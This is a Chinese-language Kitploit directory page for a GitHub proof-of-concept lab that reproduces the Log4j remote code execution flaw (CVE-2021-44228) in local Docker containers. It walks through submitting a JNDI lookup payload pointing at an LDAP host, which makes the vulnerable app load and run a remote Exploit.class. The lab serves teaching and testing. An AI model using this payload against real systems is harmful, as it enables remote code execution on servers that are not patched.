Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
log4j-rce-CVE-2021-44228 — log4j2 CVE-2021-44228 POC | Kitploit
工具/GitHubGitHub/1hakusai1/log4j-rce-cve-2021-44228
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHub1hakusai1/log4j-rce-cve-2021-44228

log4j-rce-CVE-2021-44228

log4j2 CVE-2021-44228 POC

查看仓库
4年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

概要

log4j2的远程代码执行漏洞(CVE-2021-44228)的实际测试项目。

启动容器

root@kitploit:~
docker-compose up

log4j容器启动后需要一段时间才能使用。请使用以下命令确认进度。

root@kitploit:~
docker logs -f log4j

当显示Server started: Listening on port 8081时表示准备就绪。

确认攻击前的状态

确认log4j容器的/root目录。

root@kitploit:~
docker exec log4j ls /root

初始状态下,仅存在work目录。

实际进行攻击

访问http://localhost:8081/。这是一个仅将表单中输入的名称输出到画面和日志的简单应用程序。

在表单中输入${jndi:ldap://ldap.example.com/cn=java,dc=example,dc=com}并提交。

确认log4j容器的/root目录。

root@kitploit:~
docker exec log4j ls /root

攻击者准备的代码被执行,应该会生成之前不存在的文件。文件名使用时间戳,因此攻击次数越多,新文件也会随之增加。

确认ldap容器的日志,可以看到来自log4j容器的SEARCH请求。

root@kitploit:~
docker logs ldap

确认web容器的tomcat日志,可以看到来自log4j容器对Exploit.class(用于攻击的类)的访问。

root@kitploit:~
docker exec -it web bash
cat /usr/local/tomcat/logs/localhost_access_log.*
下载工具